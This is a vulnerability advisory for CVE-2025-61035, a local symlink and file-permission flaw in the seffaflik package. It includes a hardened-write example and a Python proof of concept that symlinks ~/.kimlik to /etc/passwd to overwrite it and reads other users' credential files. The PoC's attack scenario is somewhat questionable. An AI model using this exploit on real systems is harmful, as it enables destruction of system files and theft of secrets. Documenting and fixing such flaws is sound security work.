Security Vulnerability Report
CVE-2025-61035 CVSS 7.7 HIGH

Published: 2025-10-22 14:15:52
Last Modified: 2026-04-15 00:35:42

Description

seffaflik through 0.0.9 is vulnerable to symlink attacks due to incorrect default permissions on the .kimlik and .seffaflik files, which are created with mode 0777 and 0775 respectively, exposing secrets to other local users. Additionally, the .kimlik file is written without symlink checks, allowing local attackers to overwrite arbitrary files. This can result in information disclosure and denial of service.
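The two weaknesses named in the description (lax file mode, no symlink check on write) are shown here next to a hardened write. This is an added example, not code from seffaflik or from this page: the function names and the temporary-directory scenario are constructed, and `write_secret_insecure` is a stand-in for the described pattern, not the project's actual implementation.

```python
import os
import stat
import tempfile


def write_secret_insecure(path, data):
    """Stand-in for the described pattern: follows symlinks, then mode 0777."""
    with open(path, "w") as f:      # open() follows a symlink at `path`
        f.write(data)
    os.chmod(path, 0o777)           # chmod() follows the symlink as well


def write_secret_hardened(path, data):
    """Refuse symlinks, create owner-only, and verify what was opened."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW | os.O_CLOEXEC
    fd = os.open(path, flags, 0o600)  # fails (ELOOP) if `path` is a symlink
    try:
        st = os.fstat(fd)             # inspect the opened object, not the path
        if (not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid()
                or st.st_nlink != 1):
            raise PermissionError(f"refusing to write secrets to {path}")
        os.fchmod(fd, 0o600)          # tighten a pre-existing, lax file
        os.ftruncate(fd, 0)           # truncate only after the checks pass
        os.write(fd, data.encode())   # short secret: single write suffices
    finally:
        os.close(fd)


def _read(path):
    with open(path) as f:
        return f.read()


def demo():
    """Constructed scenario: a planted symlink at the credential path."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "important.txt")
        cred = os.path.join(d, ".kimlik")
        with open(victim, "w") as f:
            f.write("original")
        os.symlink(victim, cred)
        try:
            write_secret_hardened(cred, "secret")
            results["hardened_blocked"] = False
        except OSError:
            results["hardened_blocked"] = True
        results["victim_intact"] = _read(victim) == "original"
        write_secret_insecure(cred, "secret")
        results["insecure_overwrote"] = _read(victim) == "secret"
        os.unlink(cred)
        write_secret_hardened(cred, "secret")
        results["mode"] = stat.S_IMODE(os.stat(cred).st_mode)
    return results
```

`O_NOFOLLOW` only covers the final path component, so the parent directory must itself not be writable by other users.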

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

seffaflik <= 0.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-61035 - seffaflik symlink attack PoC
# This PoC demonstrates how a local attacker can exploit
# the insecure file permissions and missing symlink checks
# in seffaflik <= 0.0.9

import os
import sys

TARGET_FILE = os.path.expanduser("~/.kimlik")
SYMLINK_TARGET = "/etc/passwd"  # Arbitrary file to overwrite


def exploit_overwrite():
    """
    Step 1: Remove existing .kimlik file if present
    Step 2: Create a symlink from ~/.kimlik to a sensitive system file
    Step 3: Wait for victim to run seffaflik, which will write
            authentication data through the symlink, overwriting the target
    """
    # Clean up any existing file/symlink
    if os.path.exists(TARGET_FILE) or os.path.islink(TARGET_FILE):
        os.remove(TARGET_FILE)

    # Create symlink pointing to arbitrary file
    os.symlink(SYMLINK_TARGET, TARGET_FILE)
    print(f"[+] Symlink created: {TARGET_FILE} -> {SYMLINK_TARGET}")
    print("[+] Waiting for victim to run seffaflik...")
    print(f"[+] When seffaflik writes .kimlik, it will overwrite {SYMLINK_TARGET}")


def exploit_read_secrets():
    """
    Exploit 2: Read secrets from another user's .kimlik file
    since it is created with mode 0777 (world-readable)
    """
    target_users = ["/home/user1/.kimlik", "/home/user2/.kimlik"]
    for path in target_users:
        if os.path.exists(path):
            try:
                with open(path, 'r') as f:
                    content = f.read()
                print(f"[+] Read secrets from {path}:")
                print(content)
            except PermissionError:
                print(f"[-] Permission denied for {path}")


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "read":
        exploit_read_secrets()
    else:
        exploit_overwrite()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61035", "sourceIdentifier": "[email protected]", "published": "2025-10-22T14:15:51.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The seffaflik thru 0.0.9 is vulnerable to symlink attacks due to incorrect default permissions given to the .kimlik file and .seffaflik file, which is created with mode 0777 and 0775 respectively, exposing secrets to other local users. Additionally, the .kimlik file is written without symlink checks, allowing local attackers to overwrite arbitrary files. This can result in information disclosure and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://github.com/nurisensoy/seffaflik", "source": "[email protected]"}, {"url": "https://github.com/nurisensoy/seffaflik/issues/3", "source": "[email protected]"}, {"url": "https://pypi.org/project/seffaflik/", "source": "[email protected]"}]}}